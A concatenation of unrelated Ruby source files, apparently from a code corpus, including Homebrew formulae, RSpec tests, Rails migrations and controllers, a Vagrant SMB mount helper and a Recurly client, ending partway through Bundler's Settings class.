sha256 "f657b3850b4f6fa2f941ed7de472ca0908f9ac3aefe3ab8502aac14753369135" => :high_sierra
sha256 "1d2cb6b785c7cc7b06a5bcaf0a39fda3ad66548b2ff09fbd23bdf293f1c1ebf0" => :sierra
sha256 "90b2466bb93be95570354475aa1cadf5b35af8944f84abfa612cea4d210d6b67" => :el_capitan
sha256 "210e6242a05505b20208e03d278c272c1d90e54b747908119400ed018636d2a6" => :yosemite
sha256 "160761c839574530f9248dc722cef07132a1535ea94b50f83a2c0aded1771c67" => :x86_64_linux # glibc 2.19
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/kelseyhightower/compose2kube").install buildpath.children
cd "src/github.com/kelseyhightower/compose2kube" do
system "go", "build", "-o", bin/"compose2kube"
prefix.install_metafiles
end
end
test do
assert_match version.to_s, shell_output("#{bin}/compose2kube -h 2>&1", 2)
end
end
| 41.647059 | 107 | 0.787429 |
086680568c29b5bd3ea5af9c6bcd7dfbdce4e080 | 1,985 | require 'spec_helper'
module Codebreaker
describe Game do
context "#start" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
end
it "generates secret code" do
expect(secret_code).not_to be_empty
end
it "saves 4 number secret code" do
expect(secret_code).to have(4).items
end
it "save secret code with nurbers from 1 to 6" do
expect(secret_code).to match(/[1-6]+/)
end
end
context "#check_up" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
game.instance_variable_set(:@secret_code, "1233")
end
it "checks result size at most 4" do
expect(game.check_up("1323")).to have_at_most(4).items
end
it "checks result is a combination of + and -" do
expect(game.check_up("1534")).to match(/[\+\-]+/)
end
it "full match gives ++++" do
expect(game.check_up("1233")).to eq("++++")
end
it "mismatch gives ''" do
expect(game.check_up("5678")).to eq("")
end
it "checks with repetition in answer" do
expect(game.check_up("1111")).to eq("+")
end
it "checks with repetition in code" do
expect(game.check_up("3555")).to eq("-")
end
end
context "#hint" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
game.instance_variable_set(:@secret_code, "1233")
end
it "show number of secret code" do
expect(game.hint(0)).to eq("1")
end
it "deprives 30 score points" do
expect{game.hint(0)}.to change {game.user.score}
end
end
context "#save" do
let(:game) {Game.new "User"}
before do
game.start
end
xit "save info about user score and attempts" do
end
end
context "#game" do
let(:game) {Game.new "User"}
before do
game.start
end
it "" do
end
end
end
end
| 18.904762 | 64 | 0.631738 |
e29743b791d222e737d2cf22d3cb5fae6db8b0fa | 54 | 100000.times { Marshal.load(Marshal.dump(Time.now)) }
| 27 | 53 | 0.740741 |
79e684075353a12203ee3b3359989606b0c260bf | 373 | class ChangeOrderSubtotalAndTax < ActiveRecord::Migration[5.0]
def change
change_column :orders, :subtotal, "numeric USING CAST(subtotal AS numeric)"
change_column :orders, :subtotal, :decimal, precision: 9, scale: 2
change_column :orders, :tax, "numeric USING CAST(tax AS numeric)"
change_column :orders, :tax, :decimal, precision: 9, scale: 2
end
end
| 41.444444 | 79 | 0.731903 |
ff126c3880ecf156b4a1b9259d4b3083367ee989 | 1,044 | # This file is copied to ~/spec when you run 'ruby script/generate rspec'
# from the project root directory.
ENV["RAILS_ENV"] ||= 'test'
require File.dirname(__FILE__) + "/../config/environment" unless defined?(Rails.root)
require 'rspec/rails'
# Requires supporting files with custom matchers and macros, etc,
# in ./support/ and its subdirectories.
Dir["http://localhost:4567/support/**/*.rb"].each {|f| require f}
# Work around rspec not yet being ORM agnostic
DataMapper::Resource.module_eval do
def has_attribute?(attribute)
attributes.include?(attribute)
end
end
Rspec.configure do |config|
# Remove this line if you don't want Rspec's should and should_not
# methods or matchers
require 'rspec/expectations'
config.include Rspec::Matchers
config.before(:all) { DataMapper.auto_migrate! }
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
end
| 28.216216 | 85 | 0.730843 |
381ad0812bf712e4a9ed08ba7f6580cbb1339d69 | 594 | class FontGensekigothic < Formula
version "1.501"
sha256 "d4baad35c36428fe355648615c30bfb5f74bc1d4eca12e88af664a83fb7c7d6a"
url "https://github.com/ButTaiwan/genseki-font/releases/download/v#{version}/GenSekiGothic.zip"
desc "GenSekiGothic"
homepage "https://github.com/ButTaiwan/genseki-font"
def install
(share/"fonts").install "GenSekiGothic-B.ttc"
(share/"fonts").install "GenSekiGothic-H.ttc"
(share/"fonts").install "GenSekiGothic-L.ttc"
(share/"fonts").install "GenSekiGothic-M.ttc"
(share/"fonts").install "GenSekiGothic-R.ttc"
end
test do
end
end
| 34.941176 | 97 | 0.742424 |
01ad9bbaa160fca781f1a78440acf326a4734c49 | 97 | class Bootstrap::BreadcrumbsController < Bootstrap::BaseBootstrapController
def index; end
end
| 24.25 | 75 | 0.835052 |
bbec2714889d7d265b731570c2ef18a8ad97c756 | 3,575 | require "shellwords"
module VagrantPlugins
module GuestLinux
module Cap
class MountSMBSharedFolder
def self.mount_smb_shared_folder(machine, name, guestpath, options)
expanded_guest_path = machine.guest.capability(
:shell_expand_guest_path, guestpath)
mount_commands = []
mount_device = "//#{options[:smb_host]}/#{name}"
if options[:owner].is_a? Integer
mount_uid = options[:owner]
else
mount_uid = "`id -u #{options[:owner]}`"
end
if options[:group].is_a? Integer
mount_gid = options[:group]
mount_gid_old = options[:group]
else
mount_gid = "`getent group #{options[:group]} | cut -d: -f3`"
mount_gid_old = "`id -g #{options[:group]}`"
end
# If a domain is provided in the username, separate it
username, domain = (options[:smb_username] || '').split('@', 2)
smb_password = options[:smb_password]
options[:mount_options] ||= []
options[:mount_options] << "sec=ntlm"
options[:mount_options] << "credentials=/etc/smb_creds_#{name}"
# First mount command uses getent to get the group
mount_options = "-o uid=#{mount_uid},gid=#{mount_gid}"
mount_options += ",#{options[:mount_options].join(",")}" if options[:mount_options]
mount_commands << "mount -t cifs #{mount_options} #{mount_device} #{expanded_guest_path}"
# Second mount command uses the old style `id -g`
mount_options = "-o uid=#{mount_uid},gid=#{mount_gid_old}"
mount_options += ",#{options[:mount_options].join(",")}" if options[:mount_options]
mount_commands << "mount -t cifs #{mount_options} #{mount_device} #{expanded_guest_path}"
# Create the guest path if it doesn't exist
machine.communicate.sudo("mkdir -p #{expanded_guest_path}")
# Write the credentials file
machine.communicate.sudo(<<-SCRIPT)
cat <<"EOF" >/etc/smb_creds_#{name}
username=#{username}
password=#{smb_password}
#{domain ? "domain=#{domain}" : ""}
EOF
chmod 0600 /etc/smb_creds_#{name}
SCRIPT
# Attempt to mount the folder. We retry here a few times because
# it can fail early on.
attempts = 0
while true
success = true
stderr = ""
mount_commands.each do |command|
no_such_device = false
stderr = ""
status = machine.communicate.sudo(command, error_check: false) do |type, data|
if type == :stderr
no_such_device = true if data =~ /No such device/i
stderr += data.to_s
end
end
success = status == 0 && !no_such_device
break if success
end
break if success
attempts += 1
if attempts > 10
command = mount_commands.join("\n")
command.gsub!(smb_password, "PASSWORDHIDDEN")
raise Vagrant::Errors::LinuxMountFailed,
command: command,
output: stderr
end
sleep 2
end
# Emit an upstart event if we can
machine.communicate.sudo <<-SCRIPT
if command -v /sbin/init && /sbin/init 2>/dev/null --version | grep upstart; then
/sbin/initctl emit --no-wait vagrant-mounted MOUNTPOINT='#{expanded_guest_path}'
fi
SCRIPT
end
end
end
end
end
| 33.726415 | 99 | 0.56979 |
5de785c07a68dab68ecee2bca4f6edec79fa9bde | 208 | module Jekyll
module Placeholders
class Generator < Jekyll::Generator
attr_accessor :site
def generate(site)
Jekyll::Placeholders::Collections.new(site)
end
end
end
end | 17.333333 | 51 | 0.668269 |
4ad0936a7a40c8f5c34cc6fc27b0774c570d3297 | 117 | class <%= file_name_camel %>Controller < ApplicationController
<%= controller_methods "actions/#{file_name}" %>
end | 39 | 62 | 0.752137 |
0897ea9cd157fccc1352c455a62145319f78d8da | 2,751 | require 'models/runtime/domain'
module VCAP::CloudController
class SharedDomain < Domain
set_dataset(shared_domains)
add_association_dependencies routes: :destroy
export_attributes :name, :internal, :router_group_guid, :router_group_type
import_attributes :name, :internal, :router_group_guid
strip_attributes :name
attr_accessor :router_group_type
def as_summary_json
{
guid: guid,
name: name,
internal: internal,
router_group_guid: router_group_guid,
router_group_type: router_group_type
}
end
def self.find_or_create(name:, router_group_guid: nil, internal: false)
logger = Steno.logger('cc.db.domain')
domain = nil
Domain.db.transaction do
domain = SharedDomain.find(name: name)
if domain
logger.info "reusing default serving domain: #{name}"
if domain.internal? != !!internal
logger.warn("Domain '#{name}' already exists. Skipping updates of internal status")
end
if domain.router_group_guid != router_group_guid
logger.warn("Domain '#{name}' already exists. Skipping updates of router_group_guid")
end
else
logger.info "creating shared serving domain: #{name}"
domain = SharedDomain.create(name: name, router_group_guid: router_group_guid, internal: internal)
end
end
domain
rescue => e
err = e.class.new("Error for shared domain name #{name}: #{e.message}")
err.set_backtrace(e.backtrace)
raise err
end
def validate
super
validate_internal_domain if internal?
end
def shared?
true
end
def protocols
return ['tcp'] if self.tcp?
['http']
end
def tcp?
# If Kubernetes is enabled that implies that we are using istio, not the routing API
return false if k8s_enabled?
if router_group_guid.present?
if @router_group_type.nil?
router_group = routing_api_client.router_group(router_group_guid)
@router_group_type = router_group.nil? ? '' : router_group.type
end
return @router_group_type.eql?('tcp')
end
false
end
def addable_to_organization!(organization); end
def transient_attrs
router_group_type.blank? ? [] : [:router_group_type]
end
def internal?
!!internal
end
private
def routing_api_client
@routing_api_client ||= CloudController::DependencyLocator.instance.routing_api_client
end
def validate_internal_domain
if router_group_guid.present?
errors.add(:router_group_guid, 'cannot be specified for internal domains')
end
end
end
end
| 25.472222 | 108 | 0.656125 |
380cd5d77038c13bb76316faa81ffa542f0f2586 | 2,353 | require 'spec_helper'
describe 'Admin::RequestsProfilesController' do
before do
FileUtils.mkdir_p(Gitlab::RequestProfiler::PROFILES_DIR)
sign_in(create(:admin))
end
after do
Gitlab::RequestProfiler.remove_all_profiles
end
describe 'GET /admin/requests_profiles' do
it 'shows the current profile token' do
allow(Rails).to receive(:cache).and_return(ActiveSupport::Cache::MemoryStore.new)
visit admin_requests_profiles_path
expect(page).to have_content("X-Profile-Token: #{Gitlab::RequestProfiler.profile_token}")
end
it 'lists all available profiles' do
time1 = 1.hour.ago
time2 = 2.hours.ago
time3 = 3.hours.ago
profile1 = "|gitlab-org|gitlab-ce_#{time1.to_i}.html"
profile2 = "|gitlab-org|gitlab-ce_#{time2.to_i}.html"
profile3 = "|gitlab-com|infrastructure_#{time3.to_i}.html"
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile1}")
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile2}")
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile3}")
visit admin_requests_profiles_path
within('.panel', text: '/gitlab-org/gitlab-ce') do
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile1)}']", text: time1.to_s(:long))
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile2)}']", text: time2.to_s(:long))
end
within('.panel', text: '/gitlab-com/infrastructure') do
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile3)}']", text: time3.to_s(:long))
end
end
end
describe 'GET /admin/requests_profiles/:profile' do
context 'when a profile exists' do
it 'displays the content of the profile' do
content = 'This is a request profile'
profile = "|gitlab-org|gitlab-ce_#{Time.now.to_i}.html"
File.write("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile}", content)
visit admin_requests_profile_path(profile)
expect(page).to have_content(content)
end
end
context 'when a profile does not exist' do
it 'shows an error message' do
visit admin_requests_profile_path('|non|existent_12345.html')
expect(page).to have_content('Profile not found')
end
end
end
end
| 33.614286 | 116 | 0.685083 |
bb9ba1f39d3ade851caf9f15f86f196af6d4e356 | 2,896 | module Recurly
class Subscription < AccountBase
self.element_name = "subscription"
def self.known_attributes
[
"plan_code",
"coupon_code",
"unit_amount_in_cents",
"quantity",
"trial_ends_at"
]
end
# initialize associations
def initialize(attributes = {}, persisted = false)
attributes = attributes.with_indifferent_access
attributes[:account] ||= {}
attributes[:addons] ||= []
super
end
def self.refund(account_code, refund_type = :partial)
raise "Refund type must be :full, :partial, or :none." unless [:full, :partial, :none].include?(refund_type)
Subscription.delete(nil, {:account_code => account_code, :refund => refund_type})
end
# Terminates the subscription immediately and processes a full or partial refund
def refund(refund_type)
self.class.refund(self.subscription_account_code, refund_type)
end
def self.cancel(account_code)
Subscription.delete(account_code)
end
# Stops the subscription from renewing. The subscription remains valid until the end of
# the current term (current_period_ends_at).
def cancel(account_code = nil)
unless account_code.nil?
ActiveSupport::Deprecation.warn('Calling Recurly::Subscription#cancel with an account_code has been deprecated. Use the static method Recurly::Subscription.cancel(account_code) instead', caller)
end
self.class.cancel(account_code || self.subscription_account_code)
end
def self.reactivate(account_code, options = {})
path = "/accounts/#{CGI::escape(account_code.to_s)}/subscription/reactivate"
connection.post(path, "", headers)
rescue ActiveResource::Redirection => e
return true
end
def reactivate
self.class.reactivate(self.subscription_account_code)
end
# Valid timeframe: :now or :renewal
# Valid options: plan_code, quantity, unit_amount
def change(timeframe, options = {})
raise "Timeframe must be :now or :renewal." unless ['now','renewal'].include?(timeframe)
options[:timeframe] = timeframe
path = "/accounts/#{CGI::escape(self.subscription_account_code.to_s)}/subscription.xml"
connection.put(path,
self.class.format.encode(options, :root => :subscription),
self.class.headers)
rescue ActiveResource::ResourceInvalid => e
self.load_errors e.response.body
end
def subscription_account_code
acct_code = self.account_code if defined?(self.account_code) and !self.account_code.nil? and !self.account_code.blank?
acct_code ||= account.account_code if defined?(account) and !account.nil?
acct_code ||= self.primary_key if defined?(self.primary_key)
acct_code ||= self.id if defined?(self.id)
raise 'Missing Account Code' if acct_code.blank?
acct_code
end
end
end
| 35.753086 | 202 | 0.691989 |
ffc5cf844021acbac4c4c244b349290b1367ee13 | 335 | class CreateConfigurationScript < ActiveRecord::Migration
def change
create_table :configuration_scripts do |t|
t.belongs_to :configuration_manager, :type => :bigint
t.string :manager_ref
t.string :name
t.string :description
t.text :variables
t.timestamps :null => false
end
end
end
| 22.333333 | 59 | 0.680597 |
62fdfedbeffb82b710767a33531c9c2935edf2f5 | 6,192 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
describe Google::Cloud::Bigquery::Project, :copy, :mock_bigquery do
let(:source_dataset) { "source_dataset" }
let(:source_table_id) { "source_table_id" }
let(:source_table_name) { "Source Table" }
let(:source_description) { "This is the source table" }
let(:source_table_gapi) { random_table_gapi source_dataset,
source_table_id,
source_table_name,
source_description }
let(:source_table) { Google::Cloud::Bigquery::Table.from_gapi source_table_gapi,
bigquery.service }
let(:target_dataset) { "target_dataset" }
let(:target_table_id) { "target_table_id" }
let(:target_table_name) { "Target Table" }
let(:target_description) { "This is the target table" }
let(:target_table_gapi) { random_table_gapi target_dataset,
target_table_id,
target_table_name,
target_description }
let(:target_table) { Google::Cloud::Bigquery::Table.from_gapi target_table_gapi,
bigquery.service }
let(:target_table_other_proj_gapi) { random_table_gapi target_dataset,
target_table_id,
target_table_name,
target_description,
"target-project" }
let(:target_table_other_proj) { Google::Cloud::Bigquery::Table.from_gapi target_table_other_proj_gapi,
bigquery.service }
it "can copy a table" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table
mock.verify
result.must_equal true
end
it "can copy to a table identified by a string" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table_other_proj, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, ["test-project", job_gapi]
result = bigquery.copy source_table, "target-project:target_dataset.target_table_id"
mock.verify
result.must_equal true
end
it "can copy to a dataset ID and table name string only" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
new_target_table = Google::Cloud::Bigquery::Table.from_gapi(
random_table_gapi(source_dataset,
"new_target_table_id",
target_table_name,
target_description),
bigquery.service
)
job_gapi = copy_job_gapi(source_table, new_target_table, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, "source_dataset.new_target_table_id"
mock.verify
result.must_equal true
end
it "can copy a table with create disposition" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.create_disposition = "CREATE_NEVER"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, create: "CREATE_NEVER"
mock.verify
result.must_equal true
end
it "can copy a table with create disposition symbol" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.create_disposition = "CREATE_NEVER"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, create: :never
mock.verify
result.must_equal true
end
it "can copy a table with write disposition" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.write_disposition = "WRITE_TRUNCATE"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, write: "WRITE_TRUNCATE"
mock.verify
result.must_equal true
end
it "can copy a table with write disposition symbol" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.write_disposition = "WRITE_TRUNCATE"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, write: :truncate
mock.verify
result.must_equal true
end
end
| 38.222222 | 104 | 0.665536 |
e95b60092603cfd54c1153c5b90502054251573c | 5,120 | require "spec_helper"
describe Clickmeetings::PrivateLabel::Conference do
context '::by_account' do
context "without block" do
before { described_class.by_account(account_id: 1) }
after(:all) { described_class.by_account(account_id: nil) }
subject { described_class.account_id }
specify { expect(subject).to eq 1 }
context "gives account_id to objects" do
subject { described_class.new.account_id }
specify { expect(subject).to eq 1 }
end
end
context 'with block' do
subject do
described_class.by_account account_id: 1 do
described_class.account_id
end
end
it "uses specified account_id in block" do
expect(subject).to eq 1
end
it "hasn't account_id out of block" do
expect(described_class.account_id).to be_nil
end
end
end
context 'without account' do
context "::find" do
subject { described_class.find(1) }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
%w(all create).each do |method|
context "::#{method}" do
subject { described_class.send method }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
end
%w(update destroy).each do |method|
context "##{method}" do
subject { described_class.new.send(method) }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
end
end
context "with account" do
before { described_class.by_account(account_id: 1) }
after(:all) { described_class.by_account(account_id: nil) }
context '::find' do
subject { described_class.find(1) }
before(:each) { mock_api(:get, 'accounts/1/conferences/1') }
it "responds with Conference object" do
expect(subject).to be_instance_of described_class
end
end
context '::all' do
before(:each) { mock_api(:get, "accounts/1/conferences") }
subject { described_class.all }
it_behaves_like 'conferences list'
end
context '::create' do
before(:each) { mock_api(:post, "accounts/1/conferences", 201) }
let(:params) do
{
name: "New Api Room",
room_name: "new_api_room",
lobby_description: "Wait some minutes",
room_type: "webinar",
permanent_room: 0,
starts_at: "2016-11-04T23:44:39+0300",
ends_at: "2016-11-05T23:44:39+0300",
lobby_enabled: 1,
access_type: 1,
password: "qwerty"
}
end
subject { described_class.create params }
it "returns Conference object" do
expect(subject).to be_an_instance_of(described_class)
end
it "has correct properties", :aggregate_failures do
expect(subject.access_role_hashes).to eq({
"listener" => "0cb61e2dd0ae19c8eb252900581baedc",
"presenter" => "acd6afeeb487cd1eb6985e00581baedc",
"host" => "49b57914e6d00ed141ea1e00581baedc"
})
expect(subject.access_type).to eq 1
expect(subject.account_id).to eq 1
expect(subject.ccc).to eq "2016-11-04 20:44:00"
expect(subject.created_at).to eq "2016-11-03T21:40:44+00:00"
expect(subject.description).to eq ""
expect(subject.embed_room_url).to eq "http://embed.anysecond.com/embed_conference.html?r=16531165866647"
expect(subject.ends_at).to eq "2016-11-04T23:44:00+00:00"
expect(subject.id).to eq 1
expect(subject.lobby_description).to eq "Wait some minutes"
expect(subject.name).to eq "newnewn"
expect(subject.name_url).to eq "newnewn"
expect(subject.permanent_room).to be_falsey
expect(subject.phone_listener_pin).to eq 869828
expect(subject.phone_presenter_pin).to eq 538883
expect(subject.recorder_list).to be_empty
expect(subject.room_pin).to eq 884449349
expect(subject.room_type).to eq "webinar"
expect(subject.room_url).to eq "http://testapi.anysecond.com/newnewn"
expect(subject.starts_at).to eq "2016-11-04T20:44:00+00:00"
expect(subject.status).to eq "active"
expect(subject.updated_at).to eq "2016-11-03T21:40:44+00:00"
end
end
context '#update' do
let(:object) { described_class.new(id: 1, access_type: 3, name: 'New Name') }
subject { object.update access_type: 1 }
before(:each) { mock_api(:put, 'accounts/1/conferences/1') }
specify { expect(subject).to be_an_instance_of described_class }
it "returns updated object" do
expect(subject.access_type).to eq 1
end
end
context "#destroy" do
let(:object) { described_class.new(id: 1, name: "Name") }
subject { object.destroy }
before(:each) { mock_api(:delete, 'accounts/1/conferences/1') }
specify { expect(subject).to be_an_instance_of described_class }
end
end
end
| 31.411043 | 112 | 0.64082 |
2807867d4b608513afae2fddfaa1695bce8edf62 | 404 | class AchievementPolicy < ApplicationPolicy
def show?
create? || !user.blocked_by?(record.user) && !user.blocked?(record.user)
end
def index?
show?
end
def create?
record.user_id == user.id
end
def update?
create?
end
def destroy?
create?
end
def next_id?
show?
end
def previous_id?
show?
end
def new_form_fields?
create?
end
end | 11.542857 | 76 | 0.621287 |
0163939b08df8848a9029f60be97e806126c349f | 1,260 | require 'formula'
require File.expand_path("../../Requirements/php-meta-requirement", __FILE__)
class Phppgadmin < Formula
homepage 'http://phppgadmin.sourceforge.net/'
url 'https://downloads.sourceforge.net/project/phppgadmin/phpPgAdmin%20%5Bstable%5D/phpPgAdmin-5.1/phpPgAdmin-5.1.tar.gz'
sha1 'ef90fc9942c67ab95f063cacc43911a40d34fbc1'
depends_on PhpMetaRequirement
def install
(share+'phppgadmin').install Dir['*']
end
def caveats; <<-EOS.undent
Note that this formula will NOT install PostgreSQL. It is not
required since you might want to get connected to a remote
database server.
Edit #{HOMEBREW_PREFIX}/share/phppgadmin/conf/config.inc.php to add needed PostgreSQL servers.
Webserver configuration example (add this at the end of
your /etc/apache2/httpd.conf for instance) :
Alias /phppgadmin #{HOMEBREW_PREFIX}/share/phppgadmin
<Directory #{HOMEBREW_PREFIX}/share/phppgadmin/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
Allow from all
</Directory>
Then, restart your web server and open http://localhost/phppgadmin
More documentation : http://phppgadmin.sourceforge.net/doku.php?id=faq_docs
EOS
end
end
| 34.054054 | 123 | 0.736508 |
6a29066f8c3246571b01eb30f99878f5d0439aca | 895 | # == Schema Information
#
# Table name: categories
#
# id :integer not null, primary key
# name :string not null
# slug :string not null
# created_at :datetime not null
# updated_at :datetime not null
# description :text
#
class CategoriesController < ApplicationController
before_action :doorkeeper_authorize!, only: [:create]
def index
authorize Category
render json: Category.all
end
def show
category = Category.find(params[:id])
authorize category
render json: category
end
def create
category = Category.new(permitted_params)
authorize category
if category.save
render json: category
else
render_validation_errors category.errors
end
end
private
def permitted_params
record_attributes.permit(:name, :description)
end
end
| 19.042553 | 55 | 0.651397 |
5d174005297c155a4224802dbe97d6cca7c247a6 | 90 | require 'rails_helper'
RSpec.describe CalorieCountsController, type: :controller do
end
| 15 | 60 | 0.822222 |
bf465f8eec8414f371e6c4c3a79189063fdb5bcb | 6,680 | require "uri"
module Bundler
class Settings
BOOL_KEYS = %w(frozen cache_all no_prune disable_local_branch_check ignore_messages gem.mit gem.coc).freeze
NUMBER_KEYS = %w(retry timeout redirect).freeze
DEFAULT_CONFIG = { :retry => 3, :timeout => 10, :redirect => 5 }
def initialize(root = nil)
@root = root
@local_config = load_config(local_config_file)
@global_config = load_config(global_config_file)
end
def [](name)
key = key_for(name)
value = (@local_config[key] || ENV[key] || @global_config[key] || DEFAULT_CONFIG[name])
case
when value.nil?
nil
when is_bool(name) || value == "false"
to_bool(value)
when is_num(name)
value.to_i
else
value
end
end
def []=(key, value)
local_config_file or raise GemfileNotFound, "Could not locate Gemfile"
set_key(key, value, @local_config, local_config_file)
end
alias_method :set_local, :[]=
def delete(key)
@local_config.delete(key_for(key))
end
def set_global(key, value)
set_key(key, value, @global_config, global_config_file)
end
def all
env_keys = ENV.keys.select {|k| k =~ /BUNDLE_.*/ }
keys = @global_config.keys | @local_config.keys | env_keys
keys.map do |key|
key.sub(/^BUNDLE_/, "").gsub(/__/, ".").downcase
end
end
def local_overrides
repos = {}
all.each do |k|
if k =~ /^local\./
repos[$'] = self[k]
end
end
repos
end
def mirror_for(uri)
uri = URI(uri.to_s) unless uri.is_a?(URI)
# Settings keys are all downcased
normalized_key = normalize_uri(uri.to_s.downcase)
gem_mirrors[normalized_key] || uri
end
def credentials_for(uri)
self[uri.to_s] || self[uri.host]
end
def gem_mirrors
all.inject({}) do |h, k|
if k =~ /^mirror\./
uri = normalize_uri($')
h[uri] = normalize_uri(self[k])
end
h
end
end
def locations(key)
key = key_for(key)
locations = {}
locations[:local] = @local_config[key] if @local_config.key?(key)
locations[:env] = ENV[key] if ENV[key]
locations[:global] = @global_config[key] if @global_config.key?(key)
locations[:default] = DEFAULT_CONFIG[key] if DEFAULT_CONFIG.key?(key)
locations
end
def pretty_values_for(exposed_key)
key = key_for(exposed_key)
locations = []
if @local_config.key?(key)
locations << "Set for your local app (#{local_config_file}): #{@local_config[key].inspect}"
end
if value = ENV[key]
locations << "Set via #{key}: #{value.inspect}"
end
if @global_config.key?(key)
locations << "Set for the current user (#{global_config_file}): #{@global_config[key].inspect}"
end
return ["You have not configured a value for `#{exposed_key}`"] if locations.empty?
locations
end
def without=(array)
set_array(:without, array)
end
def with=(array)
set_array(:with, array)
end
def without
get_array(:without)
end
def with
get_array(:with)
end
# @local_config["BUNDLE_PATH"] should be prioritized over ENV["BUNDLE_PATH"]
def path
key = key_for(:path)
path = ENV[key] || @global_config[key]
return path if path && !@local_config.key?(key)
if path = self[:path]
"#{path}/#{Bundler.ruby_scope}"
else
Bundler.rubygems.gem_dir
end
end
def allow_sudo?
!@local_config.key?(key_for(:path))
end
def ignore_config?
ENV["BUNDLE_IGNORE_CONFIG"]
end
def app_cache_path
@app_cache_path ||= begin
path = self[:cache_path] || "vendor/cache"
raise InvalidOption, "Cache path must be relative to the bundle path" if path.start_with?("/")
path
end
end
private
def key_for(key)
if key.is_a?(String) && /https?:/ =~ key
key = normalize_uri(key).to_s
end
key = key.to_s.gsub(".", "__").upcase
"BUNDLE_#{key}"
end
def parent_setting_for(name)
split_specfic_setting_for(name)[0]
end
def specfic_gem_for(name)
split_specfic_setting_for(name)[1]
end
def split_specfic_setting_for(name)
name.split(".")
end
def is_bool(name)
BOOL_KEYS.include?(name.to_s) || BOOL_KEYS.include?(parent_setting_for(name.to_s))
end
def to_bool(value)
!(value.nil? || value == "" || value =~ /^(false|f|no|n|0)$/i || value == false)
end
def is_num(value)
NUMBER_KEYS.include?(value.to_s)
end
def get_array(key)
self[key] ? self[key].split(":").map(&:to_sym) : []
end
def set_array(key, array)
self[key] = (array.empty? ? nil : array.join(":")) if array
end
def set_key(key, value, hash, file)
key = key_for(key)
unless hash[key] == value
hash[key] = value
hash.delete(key) if value.nil?
FileUtils.mkdir_p(file.dirname)
require "bundler/psyched_yaml"
File.open(file, "w") {|f| f.puts YAML.dump(hash) }
end
value
rescue Errno::EACCES
raise PermissionError.new(file)
end
def global_config_file
file = ENV["BUNDLE_CONFIG"] || File.join(Bundler.rubygems.user_home, ".bundle/config")
Pathname.new(file)
end
def local_config_file
Pathname.new(@root).join("config") if @root
end
def load_config(config_file)
valid_file = config_file && config_file.exist? && !config_file.size.zero?
if !ignore_config? && valid_file
config_regex = /^(BUNDLE_.+): (['"]?)(.*(?:\n(?!BUNDLE).+)?)\2$/
raise PermissionError.new(config_file, :read) unless config_file.readable?
config_pairs = config_file.read.scan(config_regex).map do |m|
key, _, value = m
[convert_to_backward_compatible_key(key), value.gsub(/\s+/, " ").tr('"', "'")]
end
Hash[config_pairs]
else
{}
end
end
def convert_to_backward_compatible_key(key)
key = "#{key}/" if key =~ /https?:/i && key !~ %r[/\Z]
key = key.gsub(".", "__") if key.include?(".")
key
end
# TODO: duplicates Rubygems#normalize_uri
# TODO: is this the correct place to validate mirror URIs?
def normalize_uri(uri)
uri = uri.to_s
